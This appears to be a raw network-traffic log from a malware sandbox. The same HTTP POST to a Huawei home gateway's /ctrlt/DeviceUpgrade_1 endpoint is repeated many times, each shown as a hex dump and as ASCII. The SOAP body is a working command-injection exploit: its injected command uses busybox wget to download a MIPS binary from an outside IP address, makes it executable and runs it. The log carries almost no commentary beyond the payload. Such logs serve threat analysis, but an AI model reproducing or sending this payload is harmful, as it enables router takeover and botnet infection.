6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 -l /tmp/kh -r /..23091t/mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 33 2e 39 34 2e 31 38 36 2e 32 35 30 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 2e 2e 32 33 30 39 31 74 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 23.94.186.250 